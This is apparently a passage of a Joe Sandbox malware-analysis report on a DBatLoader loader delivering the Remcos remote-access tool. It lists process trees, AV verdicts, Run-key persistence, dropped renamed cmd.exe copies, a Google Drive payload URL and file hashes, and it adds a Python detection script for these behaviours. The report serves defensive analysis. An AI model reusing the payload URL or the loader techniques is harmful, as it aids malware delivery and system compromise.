  |     |     +-- WerFault.exe [20 16]
  |     |     +-- WerFault.exe
  |     +-- cmd.exe [1]
  |     |     +-- esentutl.exe [2]
  |     |     |     Dropped: C:\Users\Public\alpha.pif (PE32)
  |     |     |     Signatures: Drops PE files to the user root directory; Drops PE files with a suspicious file extension; Drops or copies cmd.exe with a different name (likely to bypass HIPS)
  |     |     +-- alpha.pif [1]
  |     |     |     +-- xpha.pif [1]
  |     |     |           DNS/IP: 127.0.0.1 (unknown, unknown)
  |     |     +-- esentutl.exe [2]
  |     |     |     Dropped: C:\Users\Public\xpha.pif (PE32)
  |     |     +-- 6 other processes
  |     +-- esentutl.exe [2]
  |           Dropped: C:\Users\Public\Libraries\Wuqtggvo.PIF (PE32)
  |           +-- conhost.exe
  +-- Wuqtggvo.PIF
  |     Signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file
  |     +-- colorcpl.exe
  |           +-- 2 other processes
  +-- Wuqtggvo.PIF
        +-- SndVol.exe
              +-- 2 other processes

Reading the tree: the submitted sample never hosts the RAT itself. It fetches from Google Drive, uses esentutl.exe (a system utility) to write the loader copy Wuqtggvo.PIF and two renamed cmd.exe copies (alpha.pif, xpha.pif) into C:\Users\Public, and injects into colorcpl.exe; the second-stage Wuqtggvo.PIF later injects into colorcpl.exe and SndVol.exe, which is where the Remcos Yara matches and credential-theft code above are found.

Antivirus detection, submitted sample (Source | Detection | Scanner | Label):
nft438A5fN.exe | 58% | ReversingLabs | Win32.Downloader.ModiLoader
nft438A5fN.exe | 68% | Virustotal | -
nft438A5fN.exe | 100% | Avira | TR/AD.Nekark.iteef
nft438A5fN.exe | 100% | Joe Sandbox ML | -

Antivirus detection, dropped files (Source | Detection | Scanner | Label):
C:\Users\Public\Libraries\Wuqtggvo.PIF | 100% | Avira | TR/AD.Nekark.iteef
C:\Users\Public\Libraries\Wuqtggvo.PIF | 100% | Joe Sandbox ML | -
C:\Users\Public\Libraries\Wuqtggvo.PIF | 58% | ReversingLabs | Win32.Downloader.ModiLoader
C:\Users\Public\Libraries\Wuqtggvo.PIF | 68% | Virustotal | -
C:\Users\Public\alpha.pif | 0% | ReversingLabs | -
C:\Users\Public\alpha.pif | 0% | Virustotal | -
C:\Users\Public\xpha.pif | 0% | ReversingLabs | -
C:\Users\Public\xpha.pif | 0% | Virustotal | -

Note: the 0% verdicts on alpha.pif and xpha.pif are expected rather than reassuring. The signature "Drops or copies cmd.exe with a different name" identifies them as renamed copies of the legitimate cmd.exe, so their hashes are clean by construction; the indicator is a system binary copied into C:\Users\Public under a .pif name, not the file content. Wuqtggvo.PIF, by contrast, carries exactly the same verdicts as the submitted sample.
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
Domains (Name | IP | Active | Malicious | Reputation):
drive.usercontent.google.com | 142.250.181.129 | true | false | high

Contacted URLs (Name | Malicious | Reputation):
https://drive.usercontent.google.com/download?id=1dnXhBmgnD9HLHSDJbmDBCMsTIXqIwKdi | false | high

URLs found in memory and binary strings (Name | Source | Malicious | Reputation). Trailing characters such as "0", "0#", "0C" or "/C" are carried over from the surrounding binary data in which the string was found:
http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0 | nft438A5fN.exe, 00000000.00000003.1571697841.000000007EAE0000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1667611749.000000007EF00000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1571968973.000000007FC20000.00000004.00001000.00020000.00000000.sdmp | false | high
http://geoplugin.net/json.gp | colorcpl.exe | false | high
https://drive.usercontent.google.com/dow | nft438A5fN.exe, 00000000.00000002.1655641681.00000000396BD000.00000004.00001000.00020000.00000000.sdmp | false | high
https://sectigo.com/CPS0 | nft438A5fN.exe, 00000000.00000003.1571697841.000000007EAE0000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1667611749.000000007EF00000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1571968973.000000007FC20000.00000004.00001000.00020000.00000000.sdmp | false | high
http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0 | nft438A5fN.exe, 00000000.00000003.1571697841.000000007EAE0000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1667611749.000000007EF00000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1571968973.000000007FC20000.00000004.00001000.00020000.00000000.sdmp | false | high
http://ocsp.sectigo.com0 | nft438A5fN.exe, 00000000.00000003.1571697841.000000007EAE0000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1667611749.000000007EF00000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1571968973.000000007FC20000.00000004.00001000.00020000.00000000.sdmp | false | high
https://drive.usercontent.google.com:443/download?id=1dnXhBmgnD9HLHSDJbmDBCMsTIXqIwKdiX? | nft438A5fN.exe, 00000000.00000002.1611613314.0000000000884000.00000004.00000020.00020000.00000000.sdmp | false | high
http://geoplugin.net/json.gp/C | nft438A5fN.exe, 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1666471917.000000007E810000.00000004.00001000.00020000.00000000.sdmp, colorcpl.exe, 0000000B.00000002.1812796457.0000000003200000.00000040.00000400.00020000.00000000.sdmp, colorcpl.exe, 00000015.00000002.1812940524.0000000002E80000.00000040.00000400.00020000.00000000.sdmp, SndVol.exe, 00000021.00000002.1889410636.0000000003290000.00000040.00000400.00020000.00000000.sdmp | false | high
http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0# | nft438A5fN.exe, 00000000.00000003.1571697841.000000007EAE0000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1667611749.000000007EF00000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1571968973.000000007FC20000.00000004.00001000.00020000.00000000.sdmp | false | high
http://upx.sf.net | Amcache.hve.14.dr | false | high
http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0# | nft438A5fN.exe, 00000000.00000003.1571697841.000000007EAE0000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1667611749.000000007EF00000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1571968973.000000007FC20000.00000004.00001000.00020000.00000000.sdmp | false | high
http://www.pmail.com | nft438A5fN.exe, nft438A5fN.exe, 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1670762206.000000007FAB0000.00000004.00001000.00020000.00000000.sdmp | false | high
http://ocsp.sectigo.com0C | nft438A5fN.exe, 00000000.00000003.1571697841.000000007EAE0000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1667611749.000000007EF00000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1571968973.000000007FC20000.00000004.00001000.00020000.00000000.sdmp | false | high
https://drive.usercontent.google.com/t | nft438A5fN.exe, 00000000.00000002.1611613314.000000000085B000.00000004.00000020.00020000.00000000.sdmp | false | high

Note: the sectigo.com CRL/OCSP/CPS URLs come from the sample's code-signing certificate chain, not from its behaviour. The http://geoplugin.net/json.gp string, by contrast, sits in exactly the five memory regions that matched the Remcos Yara rules above (0x2D17000 and 0x7E810000 in nft438A5fN.exe, 0x3200000 and 0x2E80000 in colorcpl.exe, 0x3290000 in SndVol.exe), so it belongs to the injected RAT payload; the report's "high" reputation for geoplugin.net only means the service itself is benign.
IPs (IP | Domain | Country | ASN | ASN Name | Malicious):
142.250.181.129 | drive.usercontent.google.com | United States | 15169 | GOOGLEUS | false

Local IP:
127.0.0.1
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1562863
Start date and time: 2024-11-26 08:11:10 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 9m 20s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 41
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: nft438A5fN.exe (renamed because the original name is a hash value)
Original Sample Name: 02eec111ba55308c1d91c49ee08cb2d6c00d50893596ceef03f7664403175617.exe
Detection: MAL
Classification: mal100.rans.troj.spyw.expl.evad.winEXE@39/35@1/2
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 65
• Number of non-executed functions: 195
Cookbook Comments:
• Found application associated with file extension: .exe
• Excluded processes from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 20.42.73.29
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
• Report creation exceeded the maximum time and may be missing disassembly code information
• Report size exceeded maximum capacity and may be missing behavior information
• Report size exceeded maximum capacity and may be missing disassembly code
• Report size getting too big: too many NtOpenFile calls found
• Report size getting too big: too many NtOpenKeyEx calls found
• Report size getting too big: too many NtProtectVirtualMemory calls found
• Report size getting too big: too many NtQueryAttributesFile calls found
• Report size getting too big: too many NtQueryValueKey calls found
• Some HTTPS proxied raw data packets have been limited to 10 per session; see the PCAPs for the complete data
Note for readers of this report: the analysis hit its timeout and several size limits, and WerFault.exe and conhost.exe were whitelisted, so the behaviour lists above are a lower bound on what the sample does.
Timeline (Time | Type | Description):
02:12:12 | API Interceptor | 2x Sleep call for process nft438A5fN.exe modified
02:12:34 | API Interceptor | 2x Sleep call for process Wuqtggvo.PIF modified
02:12:38 | API Interceptor | 6x Sleep call for process WerFault.exe modified
08:12:25 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run, value Wuqtggvo = C:\Users\Public\Wuqtggvo.url
08:12:34 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run, value Wuqtggvo = C:\Users\Public\Wuqtggvo.url
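The behaviours this report records on the host (esentutl.exe writing .url/.cmd/.PIF files into C:\Users\Public, a renamed cmd.exe executed as alpha.pif, a Run value pointing at C:\Users\Public\Wuqtggvo.url, and the injected colorcpl.exe/SndVol.exe hosts carrying the geoplugin.net lookup) map onto four host-telemetry rules. The Python below is an added example written for this page, not code from Joe Sandbox or from the malware. Its event records are constructed in a Sysmon-like shape; the field names are this example's own assumption rather than the exact Sysmon schema, and the sample's desktop path is made up.

```python
"""Host-telemetry detection for the DBatLoader -> Remcos chain in this report.

Added example (not part of the Joe Sandbox report or of any vendor tooling).
Events are CONSTRUCTED in a Sysmon-like shape: id 1 = process create,
3 = network connect, 11 = file create, 13 = registry value set. The field
names below are an assumption for this example, not the exact Sysmon schema.
"""
import ntpath
import re

PUBLIC_DIR = r"c:\users\public"
# Extensions the report shows being dropped into C:\Users\Public (.url, .cmd, .PIF).
DROP_EXTENSIONS = {".pif", ".cmd", ".url"}
# System binaries the report shows hosting the injected Remcos payload.
INJECTION_HOSTS = {"colorcpl.exe", "sndvol.exe"}
RUN_KEY_RE = re.compile(r"\\software\\microsoft\\windows\\currentversion\\run\\", re.IGNORECASE)


def _under_public(path: str) -> bool:
    return path.strip('"').lower().startswith(PUBLIC_DIR + "\\")


def _ext(path: str) -> str:
    return ntpath.splitext(path.strip('"'))[1].lower()


def rule_public_drop(ev: dict) -> bool:
    """File written under C:\\Users\\Public with a loader-style extension
    (the report: Wuqtggvo.url, ovggtquW.cmd, Wuqtggvo.PIF, alpha.pif, xpha.pif)."""
    return ev["id"] == 11 and _under_public(ev["target"]) and _ext(ev["target"]) in DROP_EXTENSIONS


def rule_run_key_to_public(ev: dict) -> bool:
    """HKCU Run value whose data points into C:\\Users\\Public
    (the report: Wuqtggvo -> C:\\Users\\Public\\Wuqtggvo.url)."""
    return ev["id"] == 13 and RUN_KEY_RE.search(ev["key"]) is not None and _under_public(ev["data"])


def rule_pif_execution(ev: dict) -> bool:
    """A .pif started out of C:\\Users\\Public: the loader or a renamed cmd.exe."""
    return ev["id"] == 1 and _under_public(ev["image"]) and _ext(ev["image"]) == ".pif"


def rule_injected_host_network(ev: dict) -> bool:
    """colorcpl.exe / SndVol.exe normally make no outbound connections; in the
    report they are the injection targets and carry the geoplugin.net lookup."""
    return ev["id"] == 3 and ntpath.basename(ev["image"]).lower() in INJECTION_HOSTS


RULES = (rule_public_drop, rule_run_key_to_public, rule_pif_execution, rule_injected_host_network)


def evaluate(events: list) -> list:
    """Return (rule name, event index) for every rule that fires on an event."""
    hits = []
    for idx, ev in enumerate(events):
        for rule in RULES:
            if rule(ev):
                hits.append((rule.__name__, idx))
    return hits


# Constructed telemetry modelled on the report's process tree and autostart entries,
# followed by benign rows that must stay silent. The sample's own path is an assumption.
SAMPLE_EVENTS = [
    {"id": 11, "image": r"C:\Windows\SysWOW64\esentutl.exe", "target": r"C:\Users\Public\Libraries\Wuqtggvo.PIF"},
    {"id": 11, "image": r"C:\Windows\SysWOW64\esentutl.exe", "target": r"C:\Users\Public\alpha.pif"},
    {"id": 11, "image": r"C:\Windows\SysWOW64\esentutl.exe", "target": r"C:\Users\Public\xpha.pif"},
    {"id": 13, "image": r"C:\Users\user\Desktop\nft438A5fN.exe",
     "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Wuqtggvo",
     "data": r"C:\Users\Public\Wuqtggvo.url"},
    {"id": 1, "image": r"C:\Users\Public\alpha.pif", "parent": r"C:\Windows\SysWOW64\cmd.exe"},
    {"id": 3, "image": r"C:\Windows\SysWOW64\colorcpl.exe", "dest_host": "geoplugin.net", "dest_port": 80},
    {"id": 11, "image": r"C:\Windows\System32\svchost.exe", "target": r"C:\Users\Public\Documents\report.pdf"},
    {"id": 13, "image": r"C:\Windows\System32\reg.exe",
     "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\OneDrive",
     "data": r'"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background'},
    {"id": 3, "image": r"C:\Program Files\Mozilla Firefox\firefox.exe", "dest_host": "addons.mozilla.org", "dest_port": 443},
]

if __name__ == "__main__":
    for name, idx in evaluate(SAMPLE_EVENTS):
        print(f"{name:28s} event[{idx}] {SAMPLE_EVENTS[idx]['image']}")
```

On a real host the same four conditions read from Sysmon event IDs 1, 3, 11 and 13 (fields Image, TargetFilename, TargetObject/Details and DestinationHostname). The colorcpl.exe/SndVol.exe rule is deliberately independent of the destination: as the report shows, the payload lives inside a Microsoft system binary, so file-based AV on the injected host says nothing and the anomaly is the connection itself.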
Context for 142.250.181.129: other samples seen contacting the same IP (Associated sample name | Detection | Threat name):
a0e9f5d64349fb13191bc781f81f42e16BE4RDldhw.exe | malicious | DBatLoader
AnyDesk.exe | malicious | DBatLoader
file.exe | malicious | Unknown
file.exe | malicious | Unknown
file.exe | malicious | PureCrypter, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar
file.exe | malicious | LummaC Stealer
file.exe | malicious | LummaC Stealer
file.exe | malicious | Unknown
file.exe | malicious | Unknown
file.exe | malicious | Unknown
The IP is a shared Google front end for drive.usercontent.google.com, so this context shows that Google Drive is a common payload host, not that the IP itself is an indicator.
Context for C:\Users\Public\alpha.pif: other samples that dropped the same file (Associated sample name | Detection | Threat name):
RFQ_PO_N39859JFK_ORDER_SPECIFICATIONS_OM.bat | malicious | AgentTesla, DBatLoader
IBKB.vbs | malicious | AgentTesla, DBatLoader, PureLog Stealer
USD470900_COPY_800BLHSBC882001_NOV202024.PDF.exe | malicious | Remcos, DBatLoader
USD470900_COPY_800BLHSBC882001.PDF.bat | malicious | Remcos, DBatLoader
Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmd | malicious | AgentTesla, DBatLoader, PureLog Stealer
Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd | malicious | AgentTesla, DBatLoader, PureLog Stealer
Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd | malicious | AgentTesla, DBatLoader
x.exe | malicious | AgentTesla, DBatLoader
TC_Ziraat_Bankasi_Hesap_Ekstresi.cmd | malicious | AgentTesla, DBatLoader
#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe | malicious | DBatLoader, FormBook
Every associated sample is a DBatLoader chain, so C:\Users\Public\alpha.pif is a reliable loader artefact regardless of which final payload (Remcos here, AgentTesla or FormBook elsewhere) it delivers.
                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):65536
                                                                    Entropy (8bit):0.8985452028302241
                                                                    Encrypted:false
                                                                    SSDEEP:192:V/V9IA4/l/0S3uYjqUdZrFzuiFsZ24IO8e7H:flClsS3uYjjzuiFsY4IO8cH
                                                                    MD5:778B3CD893DACD26410077273CE276C1
                                                                    SHA1:9898516459F2B9D8C39A9DF49CBA1DA4F56C62A7
                                                                    SHA-256:C6F5126DFD92B52DC0E974736712FAEEFED5854237C830AFD1C71822D4EB88A5
                                                                    SHA-512:A6735474F10AE903DD4AE577155E3E8C7EE68EDB2FE596892D9B85B5891E3F2F56EAE0EC043B705070CE08148613EA3AB6863E2496075122877C75E0F2DD7D45
                                                                    Malicious:false
                                                                    Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.7.0.7.8.7.7.1.1.2.9.3.9.9.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.7.0.7.8.7.7.1.6.6.1.5.4.2.8.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.e.d.2.e.2.9.1.-.1.0.1.1.-.4.2.c.6.-.8.4.0.c.-.d.b.d.3.1.4.c.d.f.5.2.0.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.d.a.8.1.7.9.3.-.2.8.d.2.-.4.1.f.2.-.8.6.7.5.-.c.7.3.f.c.0.c.2.0.b.a.f.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.S.n.d.V.o.l...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.S.n.d.V.o.l...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.5.6.0.-.0.0.0.1.-.0.0.1.4.-.3.b.9.5.-.a.9.9.6.d.2.3.f.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.b.2.1.e.f.9.5.c.5.f.7.4.1.1.f.0.5.e.3.4.5.f.5.c.8.a.1.0.7.b.b.1.c.b.1.a.1.d.a.9.!.
                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):65536
                                                                    Entropy (8bit):0.8984454195613704
                                                                    Encrypted:false
                                                                    SSDEEP:192:Ve9IA4/DD0MAxEAwjqUdZrFzuiFsZ24IO8e7H:glCDwMACAwjjzuiFsY4IO8cH
                                                                    MD5:0BDDF48CE866876B6BFD742FDED7BE05
                                                                    SHA1:4953E567A4F1083E9BE4F472A1A27D239D1CB5D8
                                                                    SHA-256:A349F9C634858DE0B40E4F013C0E125BA7E9B11EFEF7CF8E953C73F74D4F160F
                                                                    SHA-512:2CFFC28A988BCD544D58F6BAD5FA111B036D27FEE4B881B7363FA831905881D9015B73290ED834FF79BD523290F1E0FBF76A9BF76B792B86CC32AFCAB9706167
                                                                    Malicious:false
                                                                    Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.7.0.7.8.7.6.5.4.4.5.5.9.0.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.7.0.7.8.7.6.6.6.7.1.5.8.4.0.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.f.6.a.f.9.5.4.-.d.0.8.e.-.4.f.2.a.-.9.5.c.1.-.6.1.4.b.1.5.e.1.7.2.c.a.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.3.7.2.8.a.1.0.-.0.6.c.b.-.4.1.a.7.-.a.9.c.3.-.5.1.1.2.3.f.3.e.8.3.c.e.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.S.n.d.V.o.l...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.S.n.d.V.o.l...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.5.6.0.-.0.0.0.1.-.0.0.1.4.-.3.b.9.5.-.a.9.9.6.d.2.3.f.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.b.2.1.e.f.9.5.c.5.f.7.4.1.1.f.0.5.e.3.4.5.f.5.c.8.a.1.0.7.b.b.1.c.b.1.a.1.d.a.9.!.
                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):65536
                                                                    Entropy (8bit):0.9301548821492783
                                                                    Encrypted:false
                                                                    SSDEEP:192:pWpxYz30S3u4jIylZrPjzuiFsZ24IO8B:E/YzES3u4jJzuiFsY4IO8B
                                                                    MD5:1006FDC20595F2D503BEC15827611CFD
                                                                    SHA1:62DEC411E2B369CE02C0360ED7F30CBA69906F27
                                                                    SHA-256:C3502BC20C0ACB2EF14C64A5EE2419C7001F6511907096051F488C6EFC6B8768
                                                                    SHA-512:FD59F57E19B6BA593A5C455CF218EEBA58B834FC4643D3D775EA5E1B65E0E7D077DE25ED090953D2878B4D62799D08B16D3E4F56F6D05A66F344B762F43569CE
                                                                    Malicious:false
                                                                    Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.7.0.7.8.7.6.2.8.1.4.5.8.6.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.7.0.7.8.7.6.3.3.8.1.8.0.0.6.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.9.6.f.d.0.9.3.-.1.9.c.a.-.4.a.1.e.-.8.3.0.1.-.6.7.7.a.8.a.2.5.e.3.0.9.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.2.b.8.5.a.7.6.-.a.6.0.e.-.4.9.e.3.-.8.8.1.5.-.9.9.9.3.e.8.1.9.6.3.3.8.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.c.o.l.o.r.c.p.l...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.c.o.l.o.r.c.p.l...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.1.b.0.-.0.0.0.1.-.0.0.1.4.-.1.a.5.2.-.5.2.9.1.d.2.3.f.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.7.e.9.b.2.6.7.f.a.e.e.4.5.9.3.d.f.4.4.e.4.1.b.0.a.5.f.b.9.0.0.d.e.6.2.0.6.
                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):65536
                                                                    Entropy (8bit):0.9298696597853339
                                                                    Encrypted:false
                                                                    SSDEEP:192:thXTmxYGX0S3u4jIylZrPjzuiFsZ24IO8B:DD2YGkS3u4jJzuiFsY4IO8B
                                                                    MD5:1231C97EB85593591E46B9665D4BA009
                                                                    SHA1:45C872A1FC79E8DBEA82EB1FD2087FE5BFBD5811
                                                                    SHA-256:1D9D96C86DB652FC4F20D13A4C4B2CE6900B19BE6A06287C8AFAE877FE04B78F
                                                                    SHA-512:6C352ECE5A3B95294E988095FC68D3962D81E87F655C226AB0231D219A0BFDE65E9D78FC994BBA714768C919A05474732790304210D81FA6661AFA8076045D8A
                                                                    Malicious:false
                                                                    Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.7.0.7.8.7.5.9.5.4.7.1.1.5.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.7.0.7.8.7.6.0.0.2.5.1.1.0.8.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.0.0.e.9.f.a.7.-.8.4.8.5.-.4.0.8.d.-.8.9.0.e.-.a.4.2.f.3.2.0.0.3.c.0.3.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.6.3.5.c.1.4.3.-.e.9.7.6.-.4.a.1.a.-.b.c.7.7.-.0.e.a.f.8.5.5.0.8.c.4.b.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.c.o.l.o.r.c.p.l...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.c.o.l.o.r.c.p.l...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.0.b.8.-.0.0.0.1.-.0.0.1.4.-.7.5.4.2.-.e.7.8.a.d.2.3.f.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.7.e.9.b.2.6.7.f.a.e.e.4.5.9.3.d.f.4.4.e.4.1.b.0.a.5.f.b.9.0.0.d.e.6.2.0.6.
                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):65536
                                                                    Entropy (8bit):0.9299635135612762
                                                                    Encrypted:false
                                                                    SSDEEP:192:1FmxYtv0MAxEAQjIylZrPjzuiFsZ24IO8B:32YtcMACAQjJzuiFsY4IO8B
                                                                    MD5:B5888C2ACD92FE57BBBA6B9EAFBFF5BF
                                                                    SHA1:A47161B1C679E41EE3C93F2CAD7898ABEE97F1B2
                                                                    SHA-256:9888E659A650D8ADBF16FA8F1CEF7D433CE048D642AECEA5C5D94882FC54E1D3
                                                                    SHA-512:B5327473E608246654E9F5083C26564C75D5EA7EABF72E3AC8CEFBE33C6602F3EB935155A0B367865AACE25E2B9A01ACD4C30117913ABD88389B4E2D454BB2B5
                                                                    Malicious:false
